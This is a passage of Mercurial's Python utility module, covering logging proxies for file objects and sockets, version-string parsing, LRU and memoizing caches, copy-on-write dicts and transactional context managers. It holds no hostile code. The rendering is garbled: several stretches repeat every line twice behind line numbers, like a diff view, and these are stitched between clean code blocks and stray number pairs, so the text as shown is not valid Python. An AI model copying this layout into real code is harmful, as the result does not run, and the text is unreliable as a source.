618 def readinto(self, *args, **kwargs):
619 return object.__getattribute__(self, '_observedcall')(
619 return object.__getattribute__(self, '_observedcall')(
620 'readinto', *args, **kwargs
620 'readinto', *args, **kwargs
621 )
621 )
622
622
623 def write(self, *args, **kwargs):
623 def write(self, *args, **kwargs):
624 return object.__getattribute__(self, '_observedcall')(
624 return object.__getattribute__(self, '_observedcall')(
625 'write', *args, **kwargs
625 'write', *args, **kwargs
626 )
626 )
627
627
628 def detach(self, *args, **kwargs):
628 def detach(self, *args, **kwargs):
629 return object.__getattribute__(self, '_observedcall')(
629 return object.__getattribute__(self, '_observedcall')(
630 'detach', *args, **kwargs
630 'detach', *args, **kwargs
631 )
631 )
632
632
633 def read1(self, *args, **kwargs):
633 def read1(self, *args, **kwargs):
634 return object.__getattribute__(self, '_observedcall')(
634 return object.__getattribute__(self, '_observedcall')(
635 'read1', *args, **kwargs
635 'read1', *args, **kwargs
636 )
636 )
637
637
638
638
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """

    def _fillbuffer(self):
        """Fill the buffer via the parent class, then tell the observer."""
        chunk = super(observedbufferedinputpipe, self)._fillbuffer()
        notify = getattr(self._input._observer, 'osread', None)
        if notify:
            notify(chunk, _chunksize)
        return chunk

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        """Read ``size`` bytes and publish a ``bufferedread`` event."""
        data = super(observedbufferedinputpipe, self).read(size)
        notify = getattr(self._input._observer, 'bufferedread', None)
        if notify:
            notify(data, size)
        return data

    def readline(self, *args, **kwargs):
        """Read a line and publish a ``bufferedreadline`` event."""
        line = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
        notify = getattr(self._input._observer, 'bufferedreadline', None)
        if notify:
            notify(line)
        return line
679
679
680
680
# Socket methods intercepted by socketproxy; any attribute not listed here
# is fetched straight from the wrapped socket by __getattribute__.
PROXIED_SOCKET_METHODS = {
    'makefile',
    'recv',
    'recvfrom',
    'recvfrom_into',
    'recv_into',
    'send',
    'sendall',
    'sendto',
    'setblocking',
    'settimeout',
    'gettimeout',
    'setsockopt',
}


class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """

    __slots__ = (
        '_orig',
        '_observer',
    )

    def __init__(self, sock, observer):
        # Use object.__setattr__ because our own __setattr__ forwards to
        # the wrapped socket.
        object.__setattr__(self, '_orig', sock)
        object.__setattr__(self, '_observer', observer)

    def __getattribute__(self, name):
        # Only methods in PROXIED_SOCKET_METHODS are served by the proxy;
        # everything else comes from the underlying socket.
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, '_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, '_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, '_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, '_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        """Invoke ``name`` on the wrapped socket, then notify the observer.

        The observer hook of the same name (if any) receives the result
        followed by the original arguments so it can react, log, etc.
        """
        # Call the original object.
        orig = object.__getattribute__(self, '_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, '_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, '_observedcall')(
            'makefile', *args, **kwargs
        )

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, '_observer')
        return makeloggingfileobject(
            observer.fh,
            res,
            observer.name,
            reads=observer.reads,
            writes=observer.writes,
            logdata=observer.logdata,
            logdataapis=observer.logdataapis,
        )

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recv', *args, **kwargs
        )

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recvfrom', *args, **kwargs
        )

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recvfrom_into', *args, **kwargs
        )

    def recv_into(self, *args, **kwargs):
        # Bug fix: this previously forwarded the misspelled name
        # 'recv_info', which raised AttributeError on the wrapped socket.
        return object.__getattribute__(self, '_observedcall')(
            'recv_into', *args, **kwargs
        )

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'send', *args, **kwargs
        )

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'sendall', *args, **kwargs
        )

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'sendto', *args, **kwargs
        )

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'setblocking', *args, **kwargs
        )

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'settimeout', *args, **kwargs
        )

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'gettimeout', *args, **kwargs
        )

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'setsockopt', *args, **kwargs
        )
818
818
819
819
class baseproxyobserver(object):
    """Shared state and payload-logging helper for proxy observers."""

    def __init__(self, fh, name, logdata, logdataapis):
        # Stream that receives the log output.
        self.fh = fh
        # Label prefixed to logged lines.
        self.name = name
        # Whether payload bytes are logged (not just API calls).
        self.logdata = logdata
        # Whether API-level call summaries are logged.
        self.logdataapis = logdataapis

    def _writedata(self, data):
        """Emit ``data`` to the log stream, honoring the logging flags."""
        fh = self.fh
        if not self.logdata:
            # Payload logging is off; just terminate any pending API line.
            if self.logdataapis:
                fh.write(b'\n')
                fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                fh.write(b': %s\n' % stringutil.escapestr(data))
            else:
                fh.write(b'%s> %s\n' % (self.name, stringutil.escapestr(data)))
            fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            fh.write(b':\n')
        for chunk in data.splitlines(True):
            fh.write(b'%s> %s\n' % (self.name, stringutil.escapestr(chunk)))
        fh.flush()
855
855
856
856
class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""

    def __init__(
        self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
    ):
        # ``reads``/``writes`` gate which directions of I/O are logged.
        super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        """Log a ``read(size)`` call that returned ``res``."""
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = b''

        if size == -1 and res == b'':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        """Log a ``readline()`` call that returned ``res``."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        """Log a ``readinto(dest)`` call that returned ``res`` bytes read."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
            )

        # ``res`` may be None (nothing read); log only the filled prefix.
        data = dest[0:res] if res is not None else b''

        # _writedata() uses "in" operator and is confused by memoryview because
        # characters are ints on Python 3.
        if isinstance(data, memoryview):
            data = data.tobytes()

        self._writedata(data)

    def write(self, res, data):
        """Log a ``write(data)`` call that returned ``res``."""
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        """Log a ``flush()`` call that returned ``res``."""
        if not self.writes:
            return

        self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        """Log a buffered ``read(size)`` performed by the pipe wrapper."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
            )

        self._writedata(res)

    def bufferedreadline(self, res):
        """Log a buffered ``readline()`` performed by the pipe wrapper."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> bufferedreadline() -> %d' % (self.name, len(res))
            )

        self._writedata(res)
955
955
956
956
def makeloggingfileobject(
    logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
):
    """Turn a file object into a logging file object."""
    # Wrap ``fh`` in a proxy whose observer writes activity to ``logh``.
    return fileobjectproxy(
        fh,
        fileobjectobserver(
            logh,
            name,
            reads=reads,
            writes=writes,
            logdata=logdata,
            logdataapis=logdataapis,
        ),
    )
971
971
972
972
class socketobserver(baseproxyobserver):
    """Logs socket activity."""

    def __init__(
        self,
        fh,
        name,
        reads=True,
        writes=True,
        states=True,
        logdata=False,
        logdataapis=True,
    ):
        # ``states`` additionally gates state-changing calls (timeouts,
        # blocking mode, socket options, makefile).
        super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
        self.reads = reads
        self.writes = writes
        self.states = states

    def makefile(self, res, mode=None, bufsize=None):
        """Log a ``makefile(mode, bufsize)`` call."""
        if not self.states:
            return

        self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        """Log a ``recv(size, flags)`` call that returned ``res``."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
            )
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        """Log a ``recvfrom()``; ``res`` is a (data, address) pair."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recvfrom(%d, %d) -> %d'
                % (self.name, size, flags, len(res[0]))
            )

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        """Log a ``recvfrom_into()``; ``res`` is an (nbytes, address) pair."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recvfrom_into(%d, %d) -> %d'
                % (self.name, size, flags, res[0])
            )

        self._writedata(buf[0 : res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        """Log a ``recv_into()``; ``res`` is the byte count received."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
            )

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        # NOTE(review): unlike sendall(), the API line here is written even
        # when logdataapis is False — confirm this asymmetry is intended.
        if not self.writes:
            return

        self.fh.write(
            b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
        )
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        """Log a ``sendall(data, flags)`` call."""
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write(
                b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
            )

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        """Log a ``sendto()``; the 3rd positional arg is flags or address."""
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write(
                b'%s> sendto(%d, %d, %r) -> %d'
                % (self.name, len(data), flags, address, res)
            )

        self._writedata(data)

    def setblocking(self, res, flag):
        """Log a ``setblocking(flag)`` state change."""
        if not self.states:
            return

        self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        """Log a ``settimeout(value)`` state change."""
        if not self.states:
            return

        self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        """Log a ``gettimeout()`` call that returned ``res``."""
        if not self.states:
            return

        self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        """Log a ``setsockopt(level, optname, value)`` state change."""
        if not self.states:
            return

        self.fh.write(
            b'%s> setsockopt(%r, %r, %r) -> %r\n'
            % (self.name, level, optname, value, res)
        )
1106
1106
1107
1107
def makeloggingsocket(
    logh,
    fh,
    name,
    reads=True,
    writes=True,
    states=True,
    logdata=False,
    logdataapis=True,
):
    """Turn a socket into a logging socket."""
    # Wrap ``fh`` in a proxy whose observer writes activity to ``logh``.
    return socketproxy(
        fh,
        socketobserver(
            logh,
            name,
            reads=reads,
            writes=writes,
            states=states,
            logdata=logdata,
            logdataapis=logdataapis,
        ),
    )
1130
1130
1131
1131
def version():
    """Return version information if available."""
    try:
        from . import __version__
    except ImportError:
        # Version module is generated at build time; absent in some setups.
        return b'unknown'
    return __version__.version
1140
1140
1141
1141
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
    if m is None:
        # No leading digits at all: the whole string is "extra".
        numeric, extra = b'', v
    elif m.group(2):
        numeric, extra = m.groups()
    else:
        numeric, extra = m.group(1), None

    assert numeric is not None  # help pytype

    vints = []
    for piece in numeric.split(b'.'):
        try:
            vints.append(int(piece))
        except ValueError:
            break
    # Pad with None so e.g. (3, 6) becomes (3, 6, None).
    vints.extend([None] * (3 - len(vints)))

    if n in (2, 3):
        return tuple(vints[:n])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
1225
1225
1226
1226
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # No arguments: memoize the single result in a one-slot list.
        slot = []

        def f():
            if not slot:
                slot.append(func())
            return slot[0]

        return f

    memo = {}
    if argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            try:
                return memo[arg]
            except KeyError:
                memo[arg] = func(arg)
                return memo[arg]

    else:

        def f(*args):
            try:
                return memo[args]
            except KeyError:
                memo[args] = func(*args)
                return memo[args]

    return f
1256
1256
1257
1257
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        pending = getattr(self, '_copied', 0)
        if pending:
            # Someone holds a "copy" of us: hand them a real duplicate
            # instead of letting the write leak into the shared object.
            self._copied = pending - 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self
1275
1275
1276
1276
class sortdict(collections.OrderedDict):
    """an ordered dictionary where re-setting a key moves it to the end

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    >>> d1.insert(1, b'a.5', 0.5)
    >>> d1
    sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
    """

    def __setitem__(self, key, value):
        # Drop any existing entry first so the key moves to the end
        # (last-set order) rather than keeping its old position.
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = pycompat.iteritems(src)
            for k, v in src:
                self[k] = v

    def insert(self, position, key, value):
        # Rebuild the tail of the mapping so (key, value) lands at *position*.
        snapshot = list(self.items())
        for idx, (k, v) in enumerate(snapshot):
            if idx == position:
                self[key] = value
            if idx >= position:
                del self[k]
                self[k] = v
1312
1312
1313
1313
1314 class cowdict(cow, dict):
1314 class cowdict(cow, dict):
1315 """copy-on-write dict
1315 """copy-on-write dict
1316
1316
1317 Be sure to call d = d.preparewrite() before writing to d.
1317 Be sure to call d = d.preparewrite() before writing to d.
1318
1318
1319 >>> a = cowdict()
1319 >>> a = cowdict()
1320 >>> a is a.preparewrite()
1320 >>> a is a.preparewrite()
1321 True
1321 True
1322 >>> b = a.copy()
1322 >>> b = a.copy()
1323 >>> b is a
1323 >>> b is a
1324 True
1324 True
1325 >>> c = b.copy()
1325 >>> c = b.copy()
1326 >>> c is a
1326 >>> c is a
1327 True
1327 True
1328 >>> a = a.preparewrite()
1328 >>> a = a.preparewrite()
1329 >>> b is a
1329 >>> b is a
1330 False
1330 False
1331 >>> a is a.preparewrite()
1331 >>> a is a.preparewrite()
1332 True
1332 True
1333 >>> c = c.preparewrite()
1333 >>> c = c.preparewrite()
1334 >>> b is c
1334 >>> b is c
1335 False
1335 False
1336 >>> b is b.preparewrite()
1336 >>> b is b.preparewrite()
1337 True
1337 True
1338 """
1338 """
1339
1339
1340
1340
class cowsortdict(cow, sortdict):
    """a sortdict with copy-on-write semantics via the cow mixin

    Be sure to call d = d.preparewrite() before writing to d.
    """
1346
1346
1347
1347
class transactional(object):  # pytype: disable=ignored-metaclass
    """Base class for making a transactional type into a context manager."""

    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Only commit on a clean exit; release() always runs, which
        # aborts the transaction when close() was never reached.
        succeeded = exc_type is None
        try:
            if succeeded:
                self.close()
        finally:
            self.release()
1373
1373
1374
1374
1375 @contextlib.contextmanager
1375 @contextlib.contextmanager
1376 def acceptintervention(tr=None):
1376 def acceptintervention(tr=None):
1377 """A context manager that closes the transaction on InterventionRequired
1377 """A context manager that closes the transaction on InterventionRequired
1378
1378
1379 If no transaction was provided, this simply runs the body and returns
1379 If no transaction was provided, this simply runs the body and returns
1380 """
1380 """
1381 if not tr:
1381 if not tr:
1382 yield
1382 yield
1383 return
1383 return
1384 try:
1384 try:
1385 yield
1385 yield
1386 tr.close()
1386 tr.close()
1387 except error.InterventionRequired:
1387 except error.InterventionRequired:
1388 tr.close()
1388 tr.close()
1389 raise
1389 raise
1390 finally:
1390 finally:
1391 tr.release()
1391 tr.release()
1392
1392
1393
1393
@contextlib.contextmanager
def nullcontextmanager(enter_result=None):
    # A no-op context manager: yields enter_result unchanged and performs
    # no cleanup on exit (compare contextlib.nullcontext in modern Python).
    yield enter_result
1397
1397
1398
1398
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """

    __slots__ = ('next', 'prev', 'key', 'value', 'cost')

    def __init__(self):
        # Link pointers are wired up by the owning cache.
        self.next = None
        self.prev = None

        # Start out as an empty slot: sentinel key, no payload, zero cost.
        self.key = _notset
        self.value = None
        self.cost = 0

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
        self.value = None
        self.cost = 0
1421
1421
1422
1422
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new code. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """

    def __init__(self, max, maxcost=0):
        # max: maximum number of entries; maxcost: optional cap on the sum
        # of entry costs (0 disables cost-based eviction).
        self._cache = {}

        # The ring starts as a single self-linked empty node and grows
        # lazily (via _addcapacity) up to self.capacity nodes.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        # A hit promotes the entry to most-recently-used.
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                self.totalcost -= node.cost
                del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        self.insert(k, v)

    def __delitem__(self, k):
        self.pop(k)

    def pop(self, k, default=_notset):
        # Remove k and return its value; like dict.pop(), raises KeyError
        # when the key is missing and no default was supplied.
        try:
            node = self._cache.pop(k)
        except KeyError:
            if default is _notset:
                raise
            return default

        assert node is not None  # help pytype
        value = node.value
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

        return value

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self.__getitem__(k)
        except KeyError:
            return default

    def peek(self, k, default=_notset):
        """Get the specified item without moving it to the head

        Unlike get(), this doesn't mutate the internal state. But be aware
        that it doesn't mean peek() is thread safe.
        """
        try:
            node = self._cache[k]
            return node.value
        except KeyError:
            if default is _notset:
                raise
            return default

    def clear(self):
        # Empty every occupied node but keep the ring itself, so the
        # already-allocated capacity is reused by future inserts.
        n = self._head
        while n.key is not _notset:
            self.totalcost -= n.cost
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None, maxcost=0):
        """Create a new cache as a copy of the current one.

        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        capacity = capacity or self.capacity
        maxcost = maxcost or self.maxcost
        result = lrucachedict(capacity, maxcost=maxcost)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result.insert(n.key, n.value, cost=n.cost)
            n = n.prev

        return result

    def popoldest(self):
        """Remove the oldest item from the cache.

        Returns the (key, value) describing the removed cache entry.
        """
        if not self._cache:
            return

        # Walk the linked list backwards starting at tail node until we hit
        # a non-empty node.
        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        assert n is not None  # help pytype

        key, value = n.key, n.value

        # And remove it from the cache and mark it as empty.
        del self._cache[n.key]
        self.totalcost -= n.cost
        n.markempty()

        return key, value

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

    def _enforcecostlimit(self):
        # This should run after an insertion. It should only be called if total
        # cost limits are being enforced.
        # The most recently inserted node is never evicted.
        if len(self) <= 1 or self.totalcost <= self.maxcost:
            return

        # This is logically equivalent to calling popoldest() until we
        # free up enough cost. We don't do that since popoldest() needs
        # to walk the linked list and doing this in a loop would be
        # quadratic. So we find the first non-empty node and then
        # walk nodes until we free up enough capacity.
        #
        # If we only removed the minimum number of nodes to free enough
        # cost at insert time, chances are high that the next insert would
        # also require pruning. This would effectively constitute quadratic
        # behavior for insert-heavy workloads. To mitigate this, we set a
        # target cost that is a percentage of the max cost. This will tend
        # to free more nodes when the high water mark is reached, which
        # lowers the chances of needing to prune on the subsequent insert.
        targetcost = int(self.maxcost * 0.75)

        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        while len(self) > 1 and self.totalcost > targetcost:
            del self._cache[n.key]
            self.totalcost -= n.cost
            n.markempty()
            n = n.prev
1719
1719
1720
1720
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:

        def f(arg):
            if arg in cache:
                # Cache hit: refresh the key's recency.
                order.remove(arg)
            else:
                if len(cache) > 20:
                    # Evict the least recently used entry.
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            order.append(arg)
            return cache[arg]

    else:

        def f(*args):
            if args in cache:
                # Cache hit: refresh the key's recency.
                order.remove(args)
            else:
                if len(cache) > 20:
                    # Evict the least recently used entry.
                    del cache[order.popleft()]
                cache[args] = func(*args)
            order.append(args)
            return cache[args]

    return f
1750
1750
1751
1751
class propertycache(object):
    """Descriptor caching the wrapped function's result on first access.

    The computed value is written into the instance __dict__ under the
    function's name, so later attribute lookups never reach the descriptor.
    """

    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
1765
1765
1766
1766
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    # propertycache stores values under the native-str attribute name.
    key = pycompat.sysstr(prop)
    if key in obj.__dict__:
        del obj.__dict__[key]
1772
1772
1773
1773
def increasingchunks(source, min=1024, max=65536):
    """return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max"""

    def log2(x):
        # floor(log2(x)) for positive x; 0 maps to 0.
        if not x:
            return 0
        return x.bit_length() - 1

    pending = []
    pendinglen = 0
    for chunk in source:
        pending.append(chunk)
        pendinglen += len(chunk)
        if pendinglen < min:
            continue
        if min < max:
            # Grow the threshold: at least double, or jump to the largest
            # power of two not exceeding what we just accumulated.
            min = min << 1
            nmin = 1 << log2(pendinglen)
            if nmin > min:
                min = nmin
            if min > max:
                min = max
        yield b''.join(pending)
        pending = []
        pendinglen = 0
    if pending:
        yield b''.join(pending)
1805
1805
1806
1806
def always(fn):
    """Predicate accepting every input; counterpart of never()."""
    return True
1809
1809
1810
1810
def never(fn):
    """Predicate rejecting every input; counterpart of always()."""
    return False
1813
1813
1814
1814
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
